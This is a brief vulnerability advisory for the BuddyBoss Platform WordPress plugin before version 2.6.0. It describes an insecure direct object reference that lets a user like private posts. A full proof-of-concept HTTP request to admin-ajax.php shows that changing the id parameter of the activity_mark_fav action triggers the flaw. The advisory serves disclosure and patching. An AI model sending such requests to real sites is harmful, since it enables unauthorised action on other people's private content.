BuddyBoss Platform < 2.6.0 - Insecure Direct Object Reference on Like Comment

Description The plugin contains an IDOR vulnerability that allows a user to like a private post by manipulating the ID included in the request

PoC

POST /wp-admin/admin-ajax.php HTTP/2 Host: buddyboss.example.com Cookie: [REDACTED] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://buddyboss.example.com/members/adele/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 72 Origin: https://buddyboss.example.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers scope=all&nonce;=2081885524&action;=activity_mark_fav&id;=194628&modbypass;= By changing the id parameter it is possible to like arbitrary post.